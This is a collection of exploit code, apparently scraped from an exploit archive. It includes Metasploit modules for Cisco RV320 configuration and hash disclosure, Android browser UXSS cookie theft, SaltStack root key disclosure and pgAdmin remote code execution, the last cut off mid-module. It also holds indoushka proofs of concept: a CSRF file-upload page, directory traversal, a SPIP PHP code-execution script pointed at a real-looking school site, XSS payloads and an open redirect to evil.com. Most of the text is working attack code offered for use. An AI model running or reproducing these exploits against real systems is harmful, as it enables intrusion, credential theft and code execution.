<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Cisco RV320/RV326 Configuration Disclosure',<br /> 'Description' => %q{<br /> A vulnerability in the web-based management interface of Cisco Small Business<br /> RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,<br /> remote attacker to retrieve sensitive information. The vulnerability is due<br /> to improper access controls for URLs. An attacker could exploit this<br /> vulnerability by connecting to an affected device via HTTP or HTTPS and<br /> requesting specific URLs. A successful exploit could allow the attacker to<br /> download the router configuration or detailed diagnostic information. Cisco<br /> has released firmware updates that address this vulnerability.<br /> },<br /> 'Author' =><br /> [<br /> 'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',<br /> 'Aaron Soto <asoto@rapid7.com>'<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> ['EDB', '46262'],<br /> ['BID', '106732'],<br /> ['CVE', '2019-1653'],<br /> ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],<br /> ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],<br /> ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']<br /> ],<br /> 'DisclosureDate' => '2019-01-24',<br /> 'DefaultOptions' =><br /> {<br /> 'SSL' => true<br /> }<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),<br /> ])<br /> end<br /><br /> def report_cred(user, hash)<br /> service_data = {<br /> address: rhost,<br /> port: rport,<br /> service_name: ssl ? 'https' : 'http',<br /> protocol: 'tcp',<br /> workspace_id: myworkspace_id<br /> }<br /><br /> credential_data = {<br /> module_fullname: self.fullname,<br /> origin_type: :service,<br /> private_data: hash,<br /> private_type: :nonreplayable_hash,<br /> jtr_format: 'md5',<br /> username: user,<br /> }.merge(service_data)<br /><br /> login_data = {<br /> core: create_credential(credential_data),<br /> status: Metasploit::Model::Login::Status::UNTRIED<br /> }.merge(service_data)<br /><br /> create_credential_login(login_data)<br /> end<br /><br /> def parse_config(config)<br /> # Report loot to database (and store on filesystem)<br /> stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)<br /> print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")<br /><br /> # Report host information to database<br /> hostname = config.match(/^HOSTNAME=(.*)/)[1]<br /> model = config.match(/^MODEL=(.*)/)[1]<br /> mac = config.match(/^LANMAC=(.*)/)[1]<br /> mac = mac.scan(/\w{2}/).join(':')<br /> report_host(host: rhost,<br /> mac: mac,<br /> name: hostname,<br /> os_name: 'Cisco',<br /> os_flavor: model)<br /><br /> # Report password hashes to database<br /> user = config.match(/^user (.*)/)[1]<br /> hash = config.match(/^password (.*)/)[1]<br /> report_cred(user, hash)<br /> end<br /><br /> def run<br /> begin<br /> uri = normalize_uri(target_uri.path)<br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'GET',<br /> }, 60)<br /> rescue OpenSSL::SSL::SSLError<br /> fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')<br /> end<br /><br /> if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')<br /> elsif res.code != 200<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")<br /> end<br /><br /> body = res.body<br /> if body.match(/####sysconfig####/)<br /> parse_config(body)<br /> else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"<br /> fail_with(Failure::NotVulnerable, 'Response suggests device is patched')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Auxiliary::Report<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',<br /> 'Description' => %q{<br /> This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in<br /> all versions of Android's open source stock browser before 4.4, and Android apps running<br /> on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug<br /> to scrape both cookie data and page contents from a vulnerable browser window.<br /><br /> If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,<br /> which will cause a popup window to be used. This requires a click from the user<br /> and is much less stealthy, but is generally harmless-looking.<br /><br /> By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this<br /> module also allows running arbitrary javascript in the context of the targeted URL.<br /> Some sample UXSS scripts are provided in data/exploits/uxss.<br /> },<br /> 'Author' => [<br /> 'Rafay Baloch', # Original discovery, disclosure<br /> 'joev' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Actions' => [<br /> [ 'WebServer' ]<br /> ],<br /> 'PassiveActions' => [<br /> 'WebServer'<br /> ],<br /> 'References' => [<br /> [ 'URL', 'http://1337day.com/exploit/description/22581' ],<br /> [ 'OSVDB', '110664' ],<br /> [ 'CVE', '2014-6041' ]<br /> ],<br /> 'DefaultAction' => 'WebServer'<br /> ))<br /><br /> register_options([<br /> OptString.new('TARGET_URLS', [<br /> true,<br /> "The comma-separated list of URLs to steal.",<br /> 'http://example.com'<br /> ]),<br /> OptString.new('CUSTOM_JS', [<br /> false,<br /> "A string of javascript to execute in the context of the target URLs.",<br /> ''<br /> ]),<br /> OptString.new('REMOTE_JS', [<br /> false,<br /> "A URL to inject into a script tag in the context of the target URLs.",<br /> ''<br /> ]),<br /> OptBool.new('BYPASS_XFO', [<br /> false,<br /> "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",<br /> false<br /> ]),<br /> OptBool.new('CLOSE_POPUP', [<br /> false,<br /> "When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",<br /> true<br /> ])<br /> ])<br /> end<br /><br /> def on_request_uri(cli, request)<br /> print_status("Request '#{request.method} #{request.uri}'")<br /><br /> if request.method.downcase == 'post'<br /> collect_data(request)<br /> send_response_html(cli, '')<br /> else<br /> payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))<br /> domains = datastore['TARGET_URLS'].split(',')<br /><br /> html = <<-EOS<br /> <html><br /> <body><br /> <script><br /> var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));<br /> var bypassXFO = #{datastore['BYPASS_XFO']};<br /> var received = [];<br /><br /> window.addEventListener('message', function(e) {<br /> var data = JSON.parse(e.data);<br /> if (!data.send) {<br /> if (bypassXFO && data.i && received[data.i]) return;<br /> if (bypassXFO && e.data) received.push(true);<br /> }<br /> var x = new XMLHttpRequest;<br /> x.open('POST', window.location, true);<br /> x.send(e.data);<br /> }, false);<br /><br /> function randomString() {<br /> var str = '';<br /> for (var i = 0; i < 5+Math.random()*15; i++) {<br /> str += String.fromCharCode('A'.charCodeAt(0) + parseInt(Math.random()*26))<br /> }<br /> return str;<br /> }<br /><br /> function installFrame(target) {<br /> var f = document.createElement('iframe');<br /> var n = randomString();<br /> f.setAttribute('name', n);<br /> f.setAttribute('src', target);<br /> f.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');<br /> f.onload = function(){<br /> attack(target, n);<br /> };<br /> document.body.appendChild(f);<br /> }<br /><br /> function attack(target, n, i, cachedN) {<br /> var exploit = function(){<br /> window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+<br /> 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+<br /> 'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+<br /> '));}void(0);', n);<br /> }<br /> if (!n) {<br /> n = cachedN || randomString();<br /> var closePopup = #{datastore['CLOSE_POPUP']};<br /> var w = window.open(target, n);<br /> var deadman = setTimeout(function(){<br /> clearInterval(clear);<br /> clearInterval(clear2);<br /> attack(targets[i], null, i, n);<br /> }, 10000);<br /> var clear = setInterval(function(){<br /> if (received[i]) {<br /> if (i < targets.length-1) {<br /> try{ w.stop(); }catch(e){}<br /> try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}<br /> }<br /><br /> clearInterval(clear);<br /> clearInterval(clear2);<br /> clearTimeout(deadman);<br /><br /> if (i < targets.length-1) {<br /> setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);<br /> } else {<br /> if (closePopup) w.close();<br /> }<br /> }<br /> }, 50);<br /> var clear2 = setInterval(function(){<br /> try {<br /> if (w.location.toString()) return;<br /> if (w.document) return;<br /> } catch(e) {}<br /> clearInterval(clear2);<br /> clear2 = setInterval(exploit, 50);<br /> },20);<br /> } else {<br /> exploit();<br /> }<br /> }<br /><br /> var clickedOnce = false;<br /> function onclickHandler() {<br /> if (clickedOnce) return false;<br /> clickedOnce = true;<br /> attack(targets[0], null, 0);<br /> return false;<br /> }<br /><br /> window.onload = function(){<br /> if (bypassXFO) {<br /> document.querySelector('#click').style.display='block';<br /> window.onclick = onclickHandler;<br /> } else {<br /> for (var i = 0; i < targets.length; i++) {<br /> installFrame(targets[i]);<br /> }<br /> }<br /> }<br /> </script><br /> <div style='text-align:center;margin:20px 0;font-size:22px;display:none'<br /> id='click' onclick='onclickHandler()'><br /> The page has moved. <a href='#'>Click here to be redirected.</a><br /> </div><br /> </body><br /> </html><br /> EOS<br /><br /> print_status("Sending initial HTML ...")<br /> send_response_html(cli, html)<br /> end<br /> end<br /><br /> def collect_data(request)<br /> response = JSON.parse(request.body)<br /> url = response['url']<br /> if response && url<br /> file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss")<br /> print_good "Collected data from URL: #{url}"<br /> print_good "Saved to: #{file}"<br /> end<br /> end<br /><br /> def backend_url<br /> proto = (datastore["SSL"] ? "https" : "http")<br /> myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']<br /> port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"<br /> "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"<br /> end<br /><br /> def custom_js<br /> rjs_hook + datastore['CUSTOM_JS']<br /> end<br /><br /> def rjs_hook<br /> remote_js = datastore['REMOTE_JS']<br /> if remote_js.present?<br /> "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "<br /> else<br /> ''<br /> end<br /> end<br /><br /> def run<br /> exploit<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /><br /> include Msf::Exploit::Remote::ZeroMQ<br /> include Msf::Auxiliary::Report<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',<br /> 'Description' => %q{<br /> This module exploits unauthenticated access to the _prep_auth_info()<br /> method in the SaltStack Salt master's ZeroMQ request server, for<br /> versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the<br /> root key used to authenticate administrative commands to the master.<br /><br /> VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as<br /> well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual<br /> Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,<br /> 1.3, 1.5, and 1.6 in certain configurations, are known to be affected<br /> by the Salt vulnerabilities.<br /><br /> Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as<br /> well as Vulhub's Docker image.<br /> },<br /> 'Author' => [<br /> 'F-Secure', # Discovery<br /> 'wvu' # Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-11651'], # Auth bypass (used by this module)<br /> ['CVE', '2020-11652'], # Authed directory traversals (not used here)<br /> ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],<br /> ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],<br /> ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],<br /> ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']<br /> ],<br /> 'DisclosureDate' => '2020-04-30', # F-Secure advisory<br /> 'License' => MSF_LICENSE,<br /> 'Actions' => [<br /> ['Dump', { 'Description' => 'Dump root key from Salt master' }]<br /> ],<br /> 'DefaultAction' => 'Dump',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'Reliability' => []<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(4506)<br /> ])<br /> end<br /><br /> def run<br /> # These are from Msf::Exploit::Remote::ZeroMQ<br /> zmq_connect<br /> zmq_negotiate<br /><br /> unless (root_key = extract_root_key(yeet_prep_auth_info))<br /> print_error('Could not find root key in serialized auth info')<br /><br /> # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce<br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> print_good("Root key: #{root_key}")<br /><br /> # I hate this API, but store the root key in creds, too<br /> create_credential_and_login(<br /> workspace_id: myworkspace_id,<br /> module_fullname: fullname,<br /> origin_type: :service,<br /> address: rhost,<br /> port: rport,<br /> protocol: 'tcp',<br /> service_name: 'salt/zeromq',<br /> username: 'root',<br /> private_data: root_key,<br /> private_type: :password<br /> )<br /><br /> # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce<br /> Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!<br /> rescue EOFError, Rex::ConnectionError => e<br /> print_error("#{e.class}: #{e.message}")<br /> Exploit::CheckCode::Unknown<br /> ensure<br /> # This is from Msf::Exploit::Remote::ZeroMQ<br /> zmq_disconnect<br /> end<br /><br /> def yeet_prep_auth_info<br /> print_status("Yeeting _prep_auth_info() at #{peer}")<br /><br /> zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))<br /><br /> unless (res = sock.get_once)<br /> fail_with(Failure::Unknown, 'Did not receive auth info')<br /> end<br /><br /> unless res.match(/user.+UserAuthenticationError.+root/m)<br /> fail_with(Failure::UnexpectedReply,<br /> "Did not receive serialized auth info: #{res.inspect}")<br /> end<br /><br /> vprint_good('Received serialized auth info')<br /><br /> # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load"<br /> res[4..]<br /> end<br /><br /> def extract_root_key(auth_info)<br /> # Fetch root key from appropriate index of deserialized data, presumably<br /> MessagePack.unpack(auth_info)[2]&.fetch('root')<br /> rescue EOFError, KeyError, MessagePack::MalformedFormatError => e<br /> print_error("#{__method__} failed: #{e.message}")<br /> nil<br /> end<br /><br />end<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Water Billing Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.<br /><br />[+] Line 33 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Direct File Upload</title><br /></head><br /><body><br /><br /> <h2>Direct File Upload</h2><br /> <form id="uploadForm"><br /> <label for="fileInput">Select File:</label><br /> <input type="file" id="fileInput" name="fileInput" required><br><br><br /><br /> <button type="button" onclick="uploadFile()">Upload File</button><br /> </form><br /><br /> <script><br /> function uploadFile() {<br /> const fileInput = document.getElementById('fileInput').files[0];<br /><br /> if (!fileInput) {<br /> alert('Please select a file.');<br /> return;<br /> }<br /><br /> const formData = new FormData();<br /> formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');<br /> formData.append('img', fileInput);<br /><br /> console.log("(+) Uploading file...");<br /><br /> fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> if (data === '1') {<br /> console.log("(+) File upload seems to have been successful!");<br /> } else {<br /> console.log("(-) Oh no, the file upload seems to have failed!");<br /> }<br /> })<br /> .catch(error => console.error("(-) Error during file upload:", error));<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /> <br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : //bower_components/bootstrap/dist/css/../../Gemfile<br /><br />[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../Gemfile<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.6 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // توليد الحمولة مع تضمين الأمر المراد تنفيذه<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // إعداد بيانات POST التي سيتم إرسالها إلى الهدف<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // تهيئة طلب HTTP باستخدام دالة cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // إضافة رؤوس مخصصة لتجاوز المنع<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // تنفيذ الطلب<br /> $response = curl_exec($ch);<br /><br /> // تحقق من وجود أخطاء في cURL<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// مثال على الاستخدام<br />$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected item : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input><br /><br />[+] Install the plugin ‘GetYourGuide Ticketing’ & activate it.<br /><br />[+] Navigate toward the GYG-Ticketing.<br /><br />[+] USe Payload : ` “><img src=x onerror=alert(1)>`<br /><br />[+] Go to link builder to verify the XSS pop-up.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress SeatReg plugin 1.54.0 open redirection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://wordpress.org/plugins/seatreg/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] An Open Redirection is a vulnerability when a web application or server<br /> uses an unvalidated user-submitted link to redirect the user to a given<br /> website or page.<br /><br />[+] USe Payload : new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com<br /><br />[+] POST /wp-admin/admin-post.php HTTP/1.1<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress WP Event Manager plugin 3.1.44 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://wordpress.org/plugins/wp-event-manager/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Install the plugins - wp-event-manager and activate it.<br /><br />[+] Go to event manager —> Add New - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.<br /><br />[+] Check the newly made event’s URL /event/{id}/ , XSS will trigger.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'pgAdmin Binary Path API RCE',<br /> 'Description' => %q{<br /> pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)<br /> vulnerability through the validate binary path API. This vulnerability<br /> allows attackers to execute arbitrary code on the server hosting PGAdmin,<br /> posing a severe risk to the database management system's integrity and the security of the underlying data.<br /><br /> Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'M.Selim Karahan', # metasploit module<br /> 'Mustafa Mutlu', # lab prep. and QA<br /> 'Ayoub Mokhtar' # vulnerability discovery and write up<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2024-3116'],<br /> [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],<br /> [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']<br /> ],<br /> 'Platform' => ['windows'],<br /> 'Arch' => ARCH_X64,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-03-28',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8000),<br /> OptString.new('USERNAME', [ false, 'User to login with', '']),<br /> OptString.new('PASSWORD', [ false, 'Password to login with', '']),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> version = get_version<br /> return CheckCode::Unknown('Unable to determine the target version') unless version<br /> return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')<br /><br /> CheckCode::Vulnerable("pgAdmin version #{version} is affected")<br /> end<br /><br /> def set_csrf_token_from_login_page(res)<br /> if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/<br /> @csrf_token = Regexp.last_match(1)<br /> # at some point between v7.0 and 7.7 the token format changed<br /> elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)<br /> @csrf_token = element['value']<br /> end<br /> end<br /><br /> def set_csrf_token_from_config(res)<br /> if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/<br /> @csrf_token = Regexp.last_match(1)<br /> # at some point between v7.0 and 7.7 the token format changed<br /> else<br /> @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first<br /> end<br /> end<br /><br /> def auth_required?<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)<br /> if res&.code == 302 && res.headers['Location']['login']<br /> true<br /> elsif res&.code == 302 && res.headers['Location']['browser']<br /> false<br /> end<br /> end<br /><br /> def on_windows?<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)<br /> if res&.code == 200<br /> platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first<br /> return platform == 'win32'<br /> end<br /> end<br /><br /> def get_version<br /> if auth_required?<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)<br /> else<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)<br /> end<br /> html_document = res&.get_html_document<br /> return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'<br /><br /> # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,<br /> # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27<br /> versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }<br /> return unless versioned_link<br /><br /> Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")<br /> end<br /><br /> def csrf_token<br /> return @csrf_token if @csrf_token<br /><br /> if auth_required?<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)<br /> set_csrf_token_from_login_page(res)<br /> else<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)<br /> set_csrf_token_from_config(res)<br /> end<br /> fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token<br /> @csrf_token<br /> end<br /><br /> def exploit<br /> if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)<br /> fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials')<br /> end<br /><br /> if auth_required?<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'authenticate/login'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'csrf_token' => csrf_token,<br /> 'email' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'language' => 'en',<br /> 'internal_button' => 'Login'<br /> }<br /> })<br /><br /> unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')<br /> fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')<br /> end<br /><br /> print_status('Successfully authenticated to pgAdmin')<br /> end<br /><br /> unless on_windows?<br /> fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!')<br /> end<br /> file_name = 'pg_restore.exe'<br /> file_manager_upload_and_trigger(file_name, generate_payload_exe)<br /> rescue ::Rex::ConnectionError<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br /><br /> # file manager code is copied from pgadmin_session_deserialization module<br /><br /> def file_manager_init<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'file_manager/init'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 